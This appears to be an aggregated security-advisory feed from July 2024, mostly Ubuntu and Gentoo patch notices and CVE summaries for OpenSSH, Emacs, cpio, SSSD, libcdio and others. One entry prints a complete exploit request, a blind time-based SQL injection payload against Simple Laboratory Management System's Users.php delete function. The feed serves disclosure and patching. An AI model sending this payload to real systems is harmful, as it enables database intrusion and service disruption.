airvertco frappejs v0.0.11 was discovered to contain a prototype pollution via the function registerView. This vulnerability allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via injecting arbitrary properties.

**frappejs was discovered to contain a prototype pollution via the function registerView**

Moderate severity GitHub Reviewed Published Jul 1, 2024 to the GitHub Advisory Database • Updated Jul 1, 2024

GHSA-gc7m-596h-x57r: frappejs was discovered to contain a prototype pollution via the function registerView

Ubuntu Security Notice 6859-1 - It was discovered that OpenSSH incorrectly handled signal management. A remote attacker could use this issue to bypass authentication and remotely access systems without proper credentials.

==========================================================================  
Ubuntu Security Notice USN-6859-1  
July 01, 2024

openssh vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 23.10  
- Ubuntu 22.04 LTS

Summary:

OpenSSH could be made to bypass authentication and remotely  
access systems without proper credentials.

Software Description:  
- openssh: secure shell (SSH) for secure access to remote machines

Details:

It was discovered that OpenSSH incorrectly handled signal management. A  
remote attacker could use this issue to bypass authentication and remotely  
access systems without proper credentials.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
  openssh-client                  1:9.6p1-3ubuntu13.3  
  openssh-server                  1:9.6p1-3ubuntu13.3

Ubuntu 23.10  
  openssh-client                  1:9.3p1-1ubuntu3.6  
  openssh-server                  1:9.3p1-1ubuntu3.6

Ubuntu 22.04 LTS  
  openssh-client                  1:8.9p1-3ubuntu0.10  
  openssh-server                  1:8.9p1-3ubuntu0.10

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6859-1  
  CVE-2024-6387

Package Information:  
  https://launchpad.net/ubuntu/+source/openssh/1:9.6p1-3ubuntu13.3  
  https://launchpad.net/ubuntu/+source/openssh/1:9.3p1-1ubuntu3.6  
  https://launchpad.net/ubuntu/+source/openssh/1:8.9p1-3ubuntu0.10

Ubuntu Security Notice USN-6859-1

Gentoo Linux Security Advisory 202407-8 - Multiple vulnerabilities have been discovered in GNU Emacs and Org Mode, the worst of which could lead to arbitrary code execution. Versions greater than or equal to 26.3-r16:26 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202407-08  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: GNU Emacs, Org Mode: Multiple Vulnerabilities  
     Date: July 01, 2024  
     Bugs: #897950, #927820  
       ID: 202407-08

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in GNU Emacs and Org Mode,  
the worst of which could lead to arbitrary code execution.

Background  
==========

GNU Emacs is a highly extensible and customizable text editor.

Affected packages  
=================

Package             Vulnerable     Unaffected  
------------------  -------------  --------------  
app-editors/emacs   < 26.3-r16:26  >= 26.3-r16:26  
                    < 27.2-r14:27  >= 27.2-r14:27  
                    < 28.2-r10:28  >= 28.2-r10:28  
                    < 29.2-r1:29   >= 29.2-r1:29  
app-emacs/org-mode  < 9.6.23       >= 9.6.23

Description  
===========

Multiple vulnerabilities have been discovered in GNU Emacs. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All GNU Emacs users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-editors/emacs-29.3-r2"

All Org Mode users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-emacs/org-mode-9.6.23"

References  
==========

[ 1 ] CVE-2022-48337  
      https://nvd.nist.gov/vuln/detail/CVE-2022-48337  
[ 2 ] CVE-2022-48338  
      https://nvd.nist.gov/vuln/detail/CVE-2022-48338  
[ 3 ] CVE-2022-48339  
      https://nvd.nist.gov/vuln/detail/CVE-2022-48339  
[ 4 ] CVE-2024-30202  
      https://nvd.nist.gov/vuln/detail/CVE-2024-30202  
[ 5 ] CVE-2024-30203  
      https://nvd.nist.gov/vuln/detail/CVE-2024-30203  
[ 6 ] CVE-2024-30204  
      https://nvd.nist.gov/vuln/detail/CVE-2024-30204  
[ 7 ] CVE-2024-30205  
      https://nvd.nist.gov/vuln/detail/CVE-2024-30205

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202407-08

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202407-08

Gentoo Linux Security Advisory 202407-7 - A vulnerability has been discovered in cpio, which can lead to arbitrary code execution. Versions greater than or equal to 2.13-r1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202407-07  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: cpio: Arbitrary Code Execution  
     Date: July 01, 2024  
     Bugs: #807088  
       ID: 202407-07

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in cpio, which can lead to arbitrary  
code execution.

Background  
==========

cpio is a file archival tool which can also read and write tar files.

Affected packages  
=================

Package        Vulnerable    Unaffected  
-------------  ------------  ------------  
app-arch/cpio  < 2.13-r1     >= 2.13-r1

Description  
===========

Multiple vulnerabilities have been discovered in cpio. Please review the  
CVE identifiers referenced below for details.

Impact  
======

GNU cpio allows attackers to execute arbitrary code via a crafted  
pattern file, because of a dstring.c ds_fgetstr integer overflow that  
triggers an out-of-bounds heap write. NOTE: it is unclear whether there  
are common cases where the pattern file, associated with the -E option,  
is untrusted data.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All cpio users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-arch/cpio-2.13-r1"

References  
==========

[ 1 ] CVE-2016-2037  
      https://nvd.nist.gov/vuln/detail/CVE-2016-2037  
[ 2 ] CVE-2019-14866  
      https://nvd.nist.gov/vuln/detail/CVE-2019-14866  
[ 3 ] CVE-2021-38185  
      https://nvd.nist.gov/vuln/detail/CVE-2021-38185

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202407-07

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202407-07

Qualys has discovered a a signal handler race condition vulnerability in OpenSSH's server, sshd. If a client does not authenticate within LoginGraceTime seconds (120 by default, 600 in old OpenSSH versions), then sshd's SIGALRM handler is called asynchronously, but this signal handler calls various functions that are not async-signal-safe - for example, syslog(). This race condition affects sshd in its default configuration.

OpenSSH Server regreSSHion Remote Code Execution

Ubuntu Security Notice 6858-1 - It was discovered that eSpeak NG did not properly manage memory under certain circumstances. An attacker could possibly use this issue to cause a denial of service, or execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-6858-1July 01, 2024espeak-ng vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 23.10- Ubuntu 22.04 LTS- Ubuntu 20.04 LTS- Ubuntu 18.04 LTSSummary:Several security issues were fixed in eSpeak NG.Software Description:- espeak-ng: Multi-lingual software speech synthesizerDetails:It was discovered that eSpeak NG did not properly manage memory under certaincircumstances. An attacker could possibly use this issue to cause a denialof service, or execute arbitrary code. (CVE-2023-49990, CVE-2023-49991,CVE-2023-49992, CVE-2023-49993, CVE-2023-49994)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 23.10  espeak-ng                       1.51+dfsg-11ubuntu0.1  espeak-ng-espeak                1.51+dfsg-11ubuntu0.1Ubuntu 22.04 LTS  espeak-ng                       1.50+dfsg-10ubuntu0.1  espeak-ng-espeak                1.50+dfsg-10ubuntu0.1Ubuntu 20.04 LTS  espeak-ng                       1.50+dfsg-6ubuntu0.1  espeak-ng-espeak                1.50+dfsg-6ubuntu0.1Ubuntu 18.04 LTS  espeak-ng                       1.49.2+dfsg-1ubuntu0.1~esm1                                  Available with Ubuntu Pro  espeak-ng-espeak                1.49.2+dfsg-1ubuntu0.1~esm1                                  Available with Ubuntu ProIn general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-6858-1  CVE-2023-49990, CVE-2023-49991, CVE-2023-49992, CVE-2023-49993,  CVE-2023-49994Package Information:  https://launchpad.net/ubuntu/+source/espeak-ng/1.51+dfsg-11ubuntu0.1  https://launchpad.net/ubuntu/+source/espeak-ng/1.50+dfsg-10ubuntu0.1  https://launchpad.net/ubuntu/+source/espeak-ng/1.50+dfsg-6ubuntu0.1

Ubuntu Security Notice USN-6858-1

Gentoo Linux Security Advisory 202407-6 - Multiple vulnerabilities have been discovered in cryptography, the worst of which could lead to a denial of service. Versions greater than or equal to 42.0.4 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202407-06  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: cryptography: Multiple Vulnerabilities  
     Date: July 01, 2024  
     Bugs: #769419, #864049, #893576, #918685, #925120  
       ID: 202407-06

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in cryptography, the worst  
of which could lead to a denial of service.

Background  
==========

cryptography is a package which provides cryptographic recipes and  
primitives to Python developers.

Affected packages  
=================

Package                  Vulnerable    Unaffected  
-----------------------  ------------  ------------  
dev-python/cryptography  < 42.0.4      >= 42.0.4

Description  
===========

Multiple vulnerabilities have been discovered in cryptography. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All cryptography users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-python/cryptography-42.0.4"

References  
==========

[ 1 ] CVE-2020-36242  
      https://nvd.nist.gov/vuln/detail/CVE-2020-36242  
[ 2 ] CVE-2023-23931  
      https://nvd.nist.gov/vuln/detail/CVE-2023-23931  
[ 3 ] CVE-2023-49083  
      https://nvd.nist.gov/vuln/detail/CVE-2023-49083  
[ 4 ] CVE-2024-26130  
      https://nvd.nist.gov/vuln/detail/CVE-2024-26130

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202407-06

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202407-06

Gentoo Linux Security Advisory 202407-5 - A vulnerability has been discovered in SSSD, which can lead to arbitrary code execution. Versions greater than or equal to 2.5.2-r1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202407-05  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: SSSD: Command Injection  
     Date: July 01, 2024  
     Bugs: #808911  
       ID: 202407-05

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in SSSD, which can lead to arbitrary  
code execution.

Background  
==========

SSSD provides a set of daemons to manage access to remote directories  
and authentication mechanisms such as LDAP, Kerberos or FreeIPA. It  
provides an NSS and PAM interface toward the system and a pluggable  
backend system to connect to multiple different account sources.

Affected packages  
=================

Package        Vulnerable    Unaffected  
-------------  ------------  ------------  
sys-auth/sssd  < 2.5.2-r1    >= 2.5.2-r1

Description  
===========

A vulnerability has been discovered in SSSD. Please review the CVE  
identifier referenced below for details.

Impact  
======

A flaw was found in SSSD, where the sssctl command was vulnerable to  
shell command injection via the logs-fetch and cache-expire subcommands.  
This flaw allows an attacker to trick the root user into running a  
specially crafted sssctl command, such as via sudo, to gain root access.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All SSSD users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=sys-auth/sssd-2.5.2-r1"

References  
==========

[ 1 ] CVE-2021-3621  
      https://nvd.nist.gov/vuln/detail/CVE-2021-3621

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202407-05

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202407-05

Simple Laboratory Management System version 1.0 suffers from a remote time-based SQL injection vulnerability.

    # Exploit Title: Simple Laboratory Management System - Manual Blind Time Based SQL Injection# Exploit Description: A SQL Injection vulnerability in Computer Laboratory Management System v1.0 allows attackers to execute arbitrary SQL commands on the database server which causes the services to delay in response time.# Affected Asset: The "delete_users" function in Users.php inside the Computer Laboratory Management System v1.0 application is vulnerable to Blind Time Based SQL Injection.# Exploit Author: Smitha Bhabal# Date: 2024-06-30# Vendor Homepage: https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-lms.zip# Version: 1.0# Tested On: Windows 11 Home 22631.3737 + XAMPP 3.3.0 (April 6th 2021)# Reference: https://github.com/payloadbox/sql-injection-payload-listPOST /php-lms/classes/Users.php?f=delete HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-GB,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-aliveCookie: PHPSESSID=1bfs2uc82iaorimhamvfj2qi6uUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1DNT: 1Sec-GPC: 1Priority: u=1Content-Length: 45Content-Type: application/x-www-form-urlencodedid=(select%20*%20from%20(select(sleep(20)))a)

Simple Laboratory Management System 1.0 SQL Injection

Ubuntu Security Notice 6855-1 - Mansour Gashasbi discovered that libcdio incorrectly handled certain memory operations when parsing an ISO file, leading to a buffer overflow vulnerability. An attacker could use this to cause a denial of service or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-6855-1  
June 28, 2024

libcdio vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.04 LTS  
- Ubuntu 23.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 LTS  
- Ubuntu 14.04 LTS

Summary:

libcdio could be made to crash or run programs as your login if it  
opened a specially crafted file.

Software Description:  
- libcdio: C++ library to read and control CD-ROM (development files)

Details:

Mansour Gashasbi discovered that libcdio incorrectly handled certain  
memory operations when parsing an ISO file, leading to a buffer overflow  
vulnerability. An attacker could use this to cause a denial of service  
or possibly execute arbitrary code.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.04 LTS  
   libcdio++1t64                   2.1.0-4.1ubuntu1.2  
   libcdio19t64                    2.1.0-4.1ubuntu1.2  
   libiso9660++0t64                2.1.0-4.1ubuntu1.2  
   libiso9660-11t64                2.1.0-4.1ubuntu1.2  
   libudf0t64                      2.1.0-4.1ubuntu1.2

Ubuntu 23.10  
   libcdio++1                      2.1.0-4ubuntu0.2  
   libcdio19                       2.1.0-4ubuntu0.2  
   libiso9660++0                   2.1.0-4ubuntu0.2  
   libiso9660-11                   2.1.0-4ubuntu0.2  
   libudf0                         2.1.0-4ubuntu0.2

Ubuntu 22.04 LTS  
   libcdio++1                      2.1.0-3ubuntu0.2  
   libcdio19                       2.1.0-3ubuntu0.2  
   libiso9660++0                   2.1.0-3ubuntu0.2  
   libiso9660-11                   2.1.0-3ubuntu0.2  
   libudf0                         2.1.0-3ubuntu0.2

Ubuntu 20.04 LTS  
   libcdio18                       2.0.0-2ubuntu0.2  
   libiso9660-11                   2.0.0-2ubuntu0.2  
   libudf0                         2.0.0-2ubuntu0.2

Ubuntu 18.04 LTS  
   libcdio17                       1.0.0-2ubuntu2+esm2  
                                   Available with Ubuntu Pro  
   libiso9660-10                   1.0.0-2ubuntu2+esm2  
                                   Available with Ubuntu Pro  
   libudf0                         1.0.0-2ubuntu2+esm2  
                                   Available with Ubuntu Pro

Ubuntu 16.04 LTS  
   libcdio13                       0.83-4.2ubuntu1+esm3  
                                   Available with Ubuntu Pro  
   libiso9660-8                    0.83-4.2ubuntu1+esm3  
                                   Available with Ubuntu Pro  
   libudf0                         0.83-4.2ubuntu1+esm3  
                                   Available with Ubuntu Pro

Ubuntu 14.04 LTS  
   libcdio13                       0.83-4.1ubuntu1+esm3  
                                   Available with Ubuntu Pro  
   libiso9660-8                    0.83-4.1ubuntu1+esm3  
                                   Available with Ubuntu Pro  
   libudf0                         0.83-4.1ubuntu1+esm3  
                                   Available with Ubuntu Pro

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6855-1  
   CVE-2024-36600

Package Information:  
   https://launchpad.net/ubuntu/+source/libcdio/2.1.0-4.1ubuntu1.2  
   https://launchpad.net/ubuntu/+source/libcdio/2.1.0-4ubuntu0.2  
   https://launchpad.net/ubuntu/+source/libcdio/2.1.0-3ubuntu0.2  
   https://launchpad.net/ubuntu/+source/libcdio/2.0.0-2ubuntu0.2

Tag

#vulnerability